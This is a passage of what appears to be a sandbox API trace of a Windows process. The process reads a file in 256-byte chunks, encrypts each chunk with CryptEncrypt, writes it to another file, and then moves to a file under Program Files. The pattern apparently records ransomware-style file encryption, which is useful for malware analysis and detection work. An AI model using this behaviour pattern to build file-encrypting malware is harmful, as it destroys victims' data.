lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.470] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.470] GetLastError () returned 0x0 [0154.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.470] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.470] GetLastError () returned 0x0 [0154.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.470] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.470] GetLastError () returned 0x0 [0154.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.470] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.470] GetLastError () returned 0x0 [0154.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.470] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.470] GetLastError () returned 0x0 [0154.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.471] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.471] GetLastError () returned 0x0 [0154.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.471] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.471] GetLastError () returned 0x0 [0154.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.471] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.471] GetLastError () returned 0x0 [0154.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.471] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.471] GetLastError () returned 0x0 [0154.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.471] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.471] GetLastError () returned 0x0 [0154.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.471] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.471] GetLastError () returned 0x0 [0154.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.471] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.472] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.472] GetLastError () returned 0x0 [0154.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.472] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.472] GetLastError () returned 0x0 [0154.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.472] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.472] GetLastError () returned 0x0 [0154.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.472] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.472] GetLastError () returned 0x0 [0154.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.472] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.472] GetLastError () returned 0x0 [0154.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.472] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.472] GetLastError () returned 0x0 [0154.472] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.472] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.473] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.473] GetLastError () returned 0x0 [0154.473] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.473] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.473] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.473] GetLastError () returned 0x0 [0154.473] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.473] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.473] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.473] GetLastError () returned 0x0 [0154.473] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.473] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.473] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.473] GetLastError () returned 0x0 [0154.473] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.473] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.473] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.473] GetLastError () returned 0x0 [0154.473] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.473] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.473] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.473] GetLastError () returned 0x0 [0154.473] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.473] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.473] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.473] GetLastError () returned 0x0 [0154.474] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.474] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.474] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.474] GetLastError () returned 0x0 [0154.474] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.474] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.474] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.474] GetLastError () returned 0x0 [0154.474] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.474] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.474] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.474] GetLastError () returned 0x0 [0154.474] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.474] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.474] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.474] GetLastError () returned 0x0 [0154.474] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.474] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.474] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.474] GetLastError () returned 0x0 [0154.474] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.474] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.474] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.474] GetLastError () returned 0x0 [0154.475] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.475] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.475] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0154.475] GetLastError () returned 0x0 [0154.475] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0154.475] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0154.475] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0154.475] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui")) 